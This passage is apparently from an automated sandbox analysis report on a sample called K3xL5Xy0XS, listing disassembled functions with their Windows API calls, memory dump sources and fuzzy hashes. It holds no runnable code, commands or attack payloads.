                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                  • Instruction ID: b116da2278578b2e068b8ec8db4363b08ce0c363e724fbc9a24ca3aa6a3b4182
                                                                                  • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                  • Instruction Fuzzy Hash: 23112971580B18AAD621BFF0DC46FFB7B9DAF20704F400925F399AB0A2DB75A5058661
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0022DA74
                                                                                  • LoadStringW.USER32(00000000), ref: 0022DA7B
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0022DA91
                                                                                  • LoadStringW.USER32(00000000), ref: 0022DA98
                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0022DADC
                                                                                  Strings
                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 0022DAB9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleLoadModuleString$Message
                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                  • API String ID: 4072794657-3128320259
                                                                                  • Opcode ID: 43f996b03f2f6ba5c6482ef9eaf17518441ad04e70419b8479b06589c9d6ffee
                                                                                  • Instruction ID: 127562082b6e595c5bd9002f1c50c03bcf770695986e2856c2d2e47fc97a5551
                                                                                  • Opcode Fuzzy Hash: 43f996b03f2f6ba5c6482ef9eaf17518441ad04e70419b8479b06589c9d6ffee
                                                                                  • Instruction Fuzzy Hash: 6C014FF69103187FE710ABA4AD8DEEA726CE708306F504492B746E2041EA749E848F78
                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(014DEB78,014DEB78), ref: 0023097B
                                                                                  • EnterCriticalSection.KERNEL32(014DEB58,00000000), ref: 0023098D
                                                                                  • TerminateThread.KERNEL32(00294528,000001F6), ref: 0023099B
                                                                                  • WaitForSingleObject.KERNEL32(00294528,000003E8), ref: 002309A9
                                                                                  • CloseHandle.KERNEL32(00294528), ref: 002309B8
                                                                                  • InterlockedExchange.KERNEL32(014DEB78,000001F6), ref: 002309C8
                                                                                  • LeaveCriticalSection.KERNEL32(014DEB58), ref: 002309CF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 3495660284-0
                                                                                  • Opcode ID: 14e41cb31f5acab8e85fd6ec62be7aa61e1c52710f14891e46af859c2696a3cb
                                                                                  • Instruction ID: ce123925843ec0e33ccc30b3d399d14e67c7d9f7d987fe2c96eabc3bd2812cd1
                                                                                  • Opcode Fuzzy Hash: 14e41cb31f5acab8e85fd6ec62be7aa61e1c52710f14891e46af859c2696a3cb
                                                                                  • Instruction Fuzzy Hash: 9BF01D31442B02BFD7416F94EE8CBDA7A25FF01702F501025F102908A0DB74A475CFA4
                                                                                  APIs
                                                                                  • GetClientRect.USER32(?,?), ref: 001C5D30
                                                                                  • GetWindowRect.USER32(?,?), ref: 001C5D71
                                                                                  • ScreenToClient.USER32(?,?), ref: 001C5D99
                                                                                  • GetClientRect.USER32(?,?), ref: 001C5ED7
                                                                                  • GetWindowRect.USER32(?,?), ref: 001C5EF8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                  • String ID:
                                                                                  • API String ID: 1296646539-0
                                                                                  • Opcode ID: 59a4c9de484d98f9391e145df20bec64b1dab184d005cf4052f2fe67503c105d
                                                                                  • Instruction ID: a395efb43992c51b5e433ab30471af98ec0fc4d42179e8884173914172b0d3cf
                                                                                  • Opcode Fuzzy Hash: 59a4c9de484d98f9391e145df20bec64b1dab184d005cf4052f2fe67503c105d
                                                                                  • Instruction Fuzzy Hash: 28B15A74A1074ADBDB14DFA9C480BEAB7F2BF54310F14841AE8A9D7290DB30EA91DB54
                                                                                  APIs
                                                                                  • __allrem.LIBCMT ref: 001F00BA
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001F00D6
                                                                                  • __allrem.LIBCMT ref: 001F00ED
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001F010B
                                                                                  • __allrem.LIBCMT ref: 001F0122
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001F0140
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                  • String ID:
                                                                                  • API String ID: 1992179935-0
                                                                                  • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                  • Instruction ID: ab1427fa48310cfc24fb8cd17ed281f7112a316de383975c45e3b10eae512ace
                                                                                  • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                  • Instruction Fuzzy Hash: C6813872604B0A9BE7259F69CC41B7F73E8AF55364F24423EF610D62C2EB70D9018B50
                                                                                  APIs
                                                                                    • Part of subcall function 00243149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,0024101C,00000000,?,?,00000000), ref: 00243195
                                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00241DC0
                                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00241DE1
                                                                                  • WSAGetLastError.WSOCK32 ref: 00241DF2
                                                                                  • inet_ntoa.WSOCK32(?), ref: 00241E8C
                                                                                  • htons.WSOCK32(?,?,?,?,?), ref: 00241EDB
                                                                                  • _strlen.LIBCMT ref: 00241F35
                                                                                    • Part of subcall function 002239E8: _strlen.LIBCMT ref: 002239F2
                                                                                    • Part of subcall function 001C6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,001DCF58,?,?,?), ref: 001C6DBA
                                                                                    • Part of subcall function 001C6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,001DCF58,?,?,?), ref: 001C6DED
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                                  • String ID:
                                                                                  • API String ID: 1923757996-0
                                                                                  • Opcode ID: ed811dd1dd9ca93064223dc6d9d0371fc40f5809289aed55bd049d039333bf53
                                                                                  • Instruction ID: d0f1c3fce1dbd41e255b129d28202286bfa72cc35ea47646058033d7a61cc260
                                                                                  • Opcode Fuzzy Hash: ed811dd1dd9ca93064223dc6d9d0371fc40f5809289aed55bd049d039333bf53
                                                                                  • Instruction Fuzzy Hash: 7EA10531614341AFC328DF20C885F2A7BE5AFA4318F54894CF4565B2E2DB71EDA6CB91
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001E82D9,001E82D9,?,?,?,001F644F,00000001,00000001,8BE85006), ref: 001F6258
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,001F644F,00000001,00000001,8BE85006,?,?,?), ref: 001F62DE
                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001F63D8
                                                                                  • __freea.LIBCMT ref: 001F63E5
                                                                                    • Part of subcall function 001F3820: RtlAllocateHeap.NTDLL(00000000,?,00291444,?,001DFDF5,?,?,001CA976,00000010,00291440,001C13FC,?,001C13C6,?,001C1129), ref: 001F3852
                                                                                  • __freea.LIBCMT ref: 001F63EE
                                                                                  • __freea.LIBCMT ref: 001F6413
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1414292761-0
                                                                                  • Opcode ID: dff55019816c488b3833d740fc7fa8090a0d7f86c07e4b317f8ebfb3884353d8
                                                                                  • Instruction ID: e150cab81f9f428c0ec117e554822f24d1603b79edd7fd4f4d66b0cd2d7541df
                                                                                  • Opcode Fuzzy Hash: dff55019816c488b3833d740fc7fa8090a0d7f86c07e4b317f8ebfb3884353d8
                                                                                  • Instruction Fuzzy Hash: ED51F172A0021AAFEB258F64DC81EBF77AAEF55750F254229FE09D7140EB34DC44C6A0
                                                                                  APIs
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                    • Part of subcall function 0024C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0024B6AE,?,?), ref: 0024C9B5
                                                                                    • Part of subcall function 0024C998: _wcslen.LIBCMT ref: 0024C9F1
                                                                                    • Part of subcall function 0024C998: _wcslen.LIBCMT ref: 0024CA68
                                                                                    • Part of subcall function 0024C998: _wcslen.LIBCMT ref: 0024CA9E
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0024BCCA
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0024BD25
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0024BD6A
                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0024BD99
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0024BDF3
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0024BDFF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                  • String ID:
                                                                                  • API String ID: 1120388591-0
                                                                                  • Opcode ID: 6115ba24e54eaa0b739e205163f28b959b6444d48da9faff6229e4c13f571681
                                                                                  • Instruction ID: 72e33974151dc9c2ba9498a851e4fb4f25cc972c6dfab272d87ca07082dc9454
                                                                                  • Opcode Fuzzy Hash: 6115ba24e54eaa0b739e205163f28b959b6444d48da9faff6229e4c13f571681
                                                                                  • Instruction Fuzzy Hash: D0818C30218241EFC719DF24C885E2ABBE5FF94308F14899DF4598B2A2DB31ED55CB92
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(00000035), ref: 0021F7B9
                                                                                  • SysAllocString.OLEAUT32(00000001), ref: 0021F860
                                                                                  • VariantCopy.OLEAUT32(0021FA64,00000000), ref: 0021F889
                                                                                  • VariantClear.OLEAUT32(0021FA64), ref: 0021F8AD
                                                                                  • VariantCopy.OLEAUT32(0021FA64,00000000), ref: 0021F8B1
                                                                                  • VariantClear.OLEAUT32(?), ref: 0021F8BB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearCopy$AllocInitString
                                                                                  • String ID:
                                                                                  • API String ID: 3859894641-0
                                                                                  • Opcode ID: f726df951fc84367f8c4fcef5170b4011599465a889e6eb17351f758c59bd062
                                                                                  • Instruction ID: a2714b738a7a729bbbe111561d1868ad20df8d27dea7f79d7257c7d9954c0776
                                                                                  • Opcode Fuzzy Hash: f726df951fc84367f8c4fcef5170b4011599465a889e6eb17351f758c59bd062
                                                                                  • Instruction Fuzzy Hash: 8251E731520310BACF50BF65D995BA9B3E4EF75310F24846BE816DF291DBB08C90CB96
                                                                                  APIs
                                                                                    • Part of subcall function 001C7620: _wcslen.LIBCMT ref: 001C7625
                                                                                    • Part of subcall function 001C6B57: _wcslen.LIBCMT ref: 001C6B6A
                                                                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 002394E5
                                                                                  • _wcslen.LIBCMT ref: 00239506
                                                                                  • _wcslen.LIBCMT ref: 0023952D
                                                                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00239585
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$FileName$OpenSave
                                                                                  • String ID: X
                                                                                  • API String ID: 83654149-3081909835
                                                                                  • Opcode ID: 50a045b486f92149fb4522142dfd7d21d38b19230e9dcae525ef3ff2c8654f90
                                                                                  • Instruction ID: 43af9a45a672991b2ab78464bd811ce5ee1b73bd7986a212f41508948e06c801
                                                                                  • Opcode Fuzzy Hash: 50a045b486f92149fb4522142dfd7d21d38b19230e9dcae525ef3ff2c8654f90
                                                                                  • Instruction Fuzzy Hash: 56E1C0716183418FC714DF24C881F6AB7E4BFA5314F04896DF8899B2A2DB70DD55CB92
                                                                                  APIs
                                                                                    • Part of subcall function 001D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001D9BB2
                                                                                  • BeginPaint.USER32(?,?,?), ref: 001D9241
                                                                                  • GetWindowRect.USER32(?,?), ref: 001D92A5
                                                                                  • ScreenToClient.USER32(?,?), ref: 001D92C2
                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001D92D3
                                                                                  • EndPaint.USER32(?,?,?,?,?), ref: 001D9321
                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002171EA
                                                                                    • Part of subcall function 001D9339: BeginPath.GDI32(00000000), ref: 001D9357
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                  • String ID:
                                                                                  • API String ID: 3050599898-0
                                                                                  • Opcode ID: 3cfef7195d3780d5b612679a4183968a3aeaa56be54da3a632278a816d5e4cec
                                                                                  • Instruction ID: e1775a77ee4133fc0d1f4be93aff6bf35d068ae571b1e0b0dc6a73be369f979b
                                                                                  • Opcode Fuzzy Hash: 3cfef7195d3780d5b612679a4183968a3aeaa56be54da3a632278a816d5e4cec
                                                                                  • Instruction Fuzzy Hash: BC41BE70104301AFE711DF25DC88FBA7BF8EF95721F14062AF9A8972A1C7319855DB61
                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 0023080C
                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00230847
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00230863
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 002308DC
                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 002308F3
                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00230921
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                  • String ID:
                                                                                  • API String ID: 3368777196-0
                                                                                  • Opcode ID: f1afd5cde1fe8729615ea774f477f827fdb7768aa7d98f190d015980c21425ec
                                                                                  • Instruction ID: cf79bbedaead1acf09f89e2d2d6133fea0c6beef2c7de58ee745e7fc141dbc8a
                                                                                  • Opcode Fuzzy Hash: f1afd5cde1fe8729615ea774f477f827fdb7768aa7d98f190d015980c21425ec
                                                                                  • Instruction Fuzzy Hash: BA418971900205EFDF04AF54DC85AAAB7B9FF04700F1040A9ED049A297DB30DE61DBA4
                                                                                  APIs
                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0021F3AB,00000000,?,?,00000000,?,0021682C,00000004,00000000,00000000), ref: 0025824C
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00258272
                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000), ref: 002582D1
                                                                                  • ShowWindow.USER32(00000000,00000004), ref: 002582E5
                                                                                  • EnableWindow.USER32(00000000,00000001), ref: 0025830B
                                                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0025832F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 642888154-0
                                                                                  • Opcode ID: c46374772a83e501548dc5debf6839922758f51b4209492e9de4d5eb2486e8b8
                                                                                  • Instruction ID: b148e975f8344eb9cbfac3a0ff183975f9b3cf59e43ac20a8728b89bf951b57c
                                                                                  • Opcode Fuzzy Hash: c46374772a83e501548dc5debf6839922758f51b4209492e9de4d5eb2486e8b8
                                                                                  • Instruction Fuzzy Hash: DF41D630601742AFDF16CF15D899BE47BE0FB09716F1841A9ED089B262CB71A869CF48
                                                                                  APIs
                                                                                  • IsWindowVisible.USER32(?), ref: 00224C95
                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00224CB2
                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00224CEA
                                                                                  • _wcslen.LIBCMT ref: 00224D08
                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00224D10
                                                                                  • _wcsstr.LIBVCRUNTIME ref: 00224D1A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                  • String ID:
                                                                                  • API String ID: 72514467-0
                                                                                  • Opcode ID: aa2368bf72032037c7738046c745306d81431e8241d432961922c029d8f94fd2
                                                                                  • Instruction ID: 2739fed3cdd2fe3a6476bcd83e398231e9b51471bf3448bff806529e71175456
                                                                                  • Opcode Fuzzy Hash: aa2368bf72032037c7738046c745306d81431e8241d432961922c029d8f94fd2
                                                                                  • Instruction Fuzzy Hash: 4A21D7312142217BEB196F79BC49E7B7B9CDF55750F10402AF805CA192EBB1DD1196A0
                                                                                  APIs
                                                                                    • Part of subcall function 001C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001C3A97,?,?,001C2E7F,?,?,?,00000000), ref: 001C3AC2
                                                                                  • _wcslen.LIBCMT ref: 0023587B
                                                                                  • CoInitialize.OLE32(00000000), ref: 00235995
                                                                                  • CoCreateInstance.OLE32(0025FCF8,00000000,00000001,0025FB68,?), ref: 002359AE
                                                                                  • CoUninitialize.OLE32 ref: 002359CC
                                                                                  Strings
                                                                                  Memory Dump Source
